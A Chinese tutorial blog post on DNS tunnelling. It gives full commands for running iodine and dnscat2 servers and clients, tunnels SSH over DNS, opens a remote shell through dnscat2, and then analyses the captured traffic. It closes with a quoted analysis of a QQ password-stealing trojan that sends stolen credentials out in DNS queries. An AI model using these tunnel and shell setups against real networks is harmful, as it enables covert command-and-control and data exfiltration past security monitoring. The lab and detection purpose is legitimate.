DNS隧道流量分析
Posted 蚁景科技
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DNS隧道流量分析相关的知识,希望对你有一定的参考价值。
1.域名准备
选择哪家的云都没问题,国内云需要实名,不建议使用,这里我选择的TX云,因为之前注册过了,自己拿来做个流量分析不成问题
域名添加解析记录
需要准备自己的vps作为DNS隧道的服务端,且需要添加ns记录
2.iodined搭建
关闭53端口关闭开机自启
systemctl stop systemd-resolved
systemctl disable systemd-resolved
之后53端口已关闭
启动服务端
iodined -f -c -P 1qaz@WSX 192.168.100.1 ns.xxx.xyz -DD
参数说明
-f:在前台运行
-c:禁止检查所有传入请求的客户端IP地址。
-P:客户端和服务端之间用于验证身份的密码。
-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。
客户端
iodine -f -P 1qaz@WSX ns.aligoogle.xyz -M 200
客户端连接正常,且服务端显示客户端连接成功
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
查看客户端网卡,因为配置的时候一直不太稳定,所以这里服务端分配的虚拟网卡我更换为了192.168.121.1
测试隧道是否通信
延时比较高,也不稳定。
通过隧道连接目标主机
ssh -p 2222 root@192.168.121.2
这里我换ssh的端口了
但是发现安全设备在连接高危端口的时候无告警
3.流量分析
抓取dns0网卡的流量
tcpdump -i dns0 port 53 -w file.pcap
参数-i 指定网卡, port 指定端口,DNS使用53端口,-w 写入文件。
查看日志发现所有的流量都是DNS日志,但是目的都为自己的VPS
其实能够根据流量特征识别工具类型。
4.试错
本来我是想使用穿透工具通过隧道穿透的,这里使用nps做隧道走socks,想走虚拟网卡需要修改nps配置文件
./npc -server=192.168.120.1:63323 -vkey=n4jg3lrvg19qlqth -type=tcp
查看nps上线后,需要做端口转发,不做端口转发无法直接使用虚拟地址的隧道,这里其实没有这么走的意义
但是这里发现行不通,参考了一些文章,发现某位师傅写的有点儿问题,这里大可不必,没有所谓的套层+转口转发,单一走隧道都不稳定以及卡的要死,怎么玩儿套娃。
5. dnscat2搭建
安装准备
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
curl -sSL https://get.rvm.io | bash
source /etc/profile.d/rvm.sh
rvm install 2.6.0
source /etc/profile.d/rvm.sh
rvm use 2.6.0
gem install bundler
bundle install
ruby ./dnscat2.rb
需要注意这里开放vps的53的udp端口
firewall-cmd --zone=public --add-port=53/udp --permanent
firewall-cmd --reload
国内服务器TX云的话需要更换源,下载文件需要kexue上网,境内下载tools找不到服务
客户端
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
./dnscat --dns server=IP,port=53 --secret=f361f307f523b07352d0bab1b765a888 //直连模式
./dnscat --dns server=ling.domain --secret=1qaz2wsx //中继模式
直连模式
Server:
Client:
中继模式
ruby ./dnscat2.rb ns.domain -e open -c 1qaz2wsx --no-cache
客户端
./dnscat --dns domain=ling.domain --secret=1qaz2wsx
./dnscat --dns server=www.domain --secret=1qaz2wsx
服务端命令
sessions 列出所有session
session -i 2 进入session 2
shell:创建交互式shell
suspend:返回上一层
exit:退出
clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell,此处必须在1::command(kali)中使用)
download/upload(两端之间上传下载文件)
listen <本地端口> <控制端IP/127.0.0.1>:<端口>(端口转发,此处)(此处必须在1::command(kali)中使用)
dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!
That means you can enter a dnscat2 command such as
\'ping\'! For a full list of clients, try \'help\'.
command (ubuntu) 1> whoami
Error: Unknown command: whoami
command (ubuntu) 1> shell
Sent request to execute a shell
command (ubuntu) 1> New window created: 2
Shell session created!
whoami
Error: Unknown command: whoami
command (ubuntu) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don\'t
see a prompt, try typing \'pwd\' or something!
To go back, type ctrl-z.
sh (ubuntu) 2> whoami
sh (ubuntu) 2> root
tcpdump -i dns0 port 53 -w file.pcap
流量包内的数据内容
请求包和回包区别不大,在返回包多了域名的信息的TXT记录加密传输信息,可以看到DNS的查询请求的域名信息前的一串数据,里面就是加密过后的交互数据。
6 其它工具
跟工具关系不大,隧道的话DNS只要ip和域名没标签,其实走的都是udp的协议,所以在安全设备上都是流量数据,其类似的工具有dns2tcp等,但是总体来讲该隧道比较慢不稳定,比较慢且传输不支持大流量传输。
更多网安技能的在线实操练习,请点击这里>>
“DNS隧道”盗号木马分析——类似hjack偷密码然后利用dns tunnel直传数据发送出去
摘自:http://www.freebuf.com/articles/network/38276.html#
运行后不断监控顶端窗口,一旦发现为QQ,就弹出一个自己伪造的QQ登陆窗口,诱导用户输入密码
编码与发送
如果你不幸输入了密码并点击了登陆,那么请节哀——你中招了。你的QQ号和密码这些隐私数据正在木马指令的授意下,被你自己不惜高价买下的高性能CPU和内存飞速的进行着编码,并最终由你所钟爱的那块网卡发送到盗号者的服务器上……这绝对会是一个忧伤的故事……
但木马的编码过程却颇费周章:
首先,是将一个固定字符串“aaaaaa”与你的QQ号和密码这三组字符串,以制表符(’\t’)相连,拼成一个新的字符串,并将其转为UTF-16编码
然后,将上面的拼出的字符串的字符数(非字节数,实际上由于是UTF-16编码,字符数是字节数的1/2),保存为大端的WORD形式
接着,再将之前得到的账号信息字符串取Hex字符串后再次进行UTF-16编码……
我自己说着都乱……举个例子,字符’a‘,也就是’\x61′,UTF-16编码后就是’\x61\x00′,取Hex字符串就变成了’6100′,也就是’\x36\x31\x30\x30′,再UTF-16后则是’\x36\x00\x31\x00\x30\x00\x30\x00′
好吧,我猜大部分人还是晕……直接给大家看看最终结果吧,你的账号信息已经变的面目全非了:
同时,前面获取到的字符数也做同样的处理,并拼到上面这个字符串的前面,如下:
最后,以16字符为一批进行循环加密,并将加密后数据转成UTF-16编码的Hex字符串,最终结果如下:
这么麻烦,当然是为了绕过各种检测和分析系统,但同时还有一个目的——盗号者需要加密后的结果依然保持所有字符必须只有字母和数字组成(理论上还可以有连字符)。
这是为了给这个木马最关键的一步做好铺垫——以DNS查询的形式将账号信息发送出去!
木马在内存中将加密后的字符串,前面拼上”www.”,后面拼上”.cn”,得到了一个根本不存在的域名。再填上必须的结构,精心构造出了一个DNS查询数据包。
再将这个数据包用UDP协议发送到了自己的服务器的53端口——一切看起来都如此的天衣无缝。
一个DNS查询而已,没有额外的非法数据,只是查询了一个不存在的域名,伪装的够深了吧!
百密一疏
但其实,通过Wireshark抓包还是可以看到一个很讽刺的事实——这个数据包依然是畸形的!根本不是正常的DNS查询。
根据Wireshark的报错信息,可以看到问题出在Queries这一段上,那具体是哪里异常了呢?QNAME部分的每个Label和前面的字节数都能对应上,QType是0×0001——A类请求,QClass是0×0001——IN。看着好像都没错啊?
其实问题还就是出在了木马作者精心拼凑的这个加密字符串上,这一段Label的字节数为0×80——即128字节。而DNS请求的数据结构中队Label的长度可是有严格的规定的:
Labels must be 63 characters or less.(参考RFC882 [Page30])
也就是说Label被允许的最大长度只有63字节——即0x3f,只要超过了这个值,即为畸形!
最后
360的拦截截图是不能少的:
以上是关于DNS隧道流量分析的主要内容,如果未能解决你的问题,请参考以下文章
“DNS隧道”盗号木马分析——类似hjack偷密码然后利用dns tunnel直传数据发送出去
一次误报引发的DNS检测方案的思考:DNS隧道检测平民解决方案
DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器